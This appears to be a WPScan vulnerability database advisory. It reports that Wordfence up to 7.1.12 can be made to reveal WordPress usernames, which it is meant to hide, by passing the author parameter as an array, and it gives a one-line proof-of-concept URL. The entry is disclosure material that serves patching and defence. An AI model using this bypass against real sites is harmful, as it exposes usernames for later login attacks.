Wordfence <= 7.1.12 - Username Enumeration Prevention Bypass



Proof of Concept
Wordfence blocks:

http://www.example.com/?author=1

But allowed:

http://www.example.com/?author[]=1

Affects Plugin

fixed in version 7.1.14

References

PACKETSTORM 149845
URL http://www.waraxe.us/advisory-109.html

Classification

Type BYPASS

Miscellaneous

Original Researcher Janek Vind "waraxe"
Submitter Ryan Dewhurst
Submitter Website https://dewhurstsecurity.com/
Submitter Twitter ethicalhack3r
Views 3692
Verified Yes
WPVDB ID 9135

Timeline

Publicly Published 2018-10-02 (about 2 months ago)
Added 2018-10-18 (about 1 month ago)
Last Updated 2018-10-18 (about 1 month ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.